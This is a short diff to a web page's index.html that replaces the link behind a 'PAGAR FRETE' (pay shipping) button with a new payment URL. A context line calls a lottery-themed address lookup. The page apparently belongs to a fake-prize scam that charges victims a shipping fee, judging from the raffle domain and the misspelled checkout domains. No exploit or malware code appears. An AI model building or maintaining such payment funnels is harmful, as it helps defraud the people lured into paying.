--- a/index.html
+++ b/index.html
@@ -246,7 +246,7 @@ fetch("https://sorteiovivasorte1.com/get-endereco.php/get-endereco.php")
 
 
 
-                <a id="buttonClick" href="https://pay.novopagamentooseguroo.com/checkout/74e7725f-af2d-42f9-b616-9f7659c9b9d5">
+                <a id="buttonClick" href="https://go.nitropagamentos.com/vaotmzrf2s">
                     PAGAR FRETE
                 </a>
 
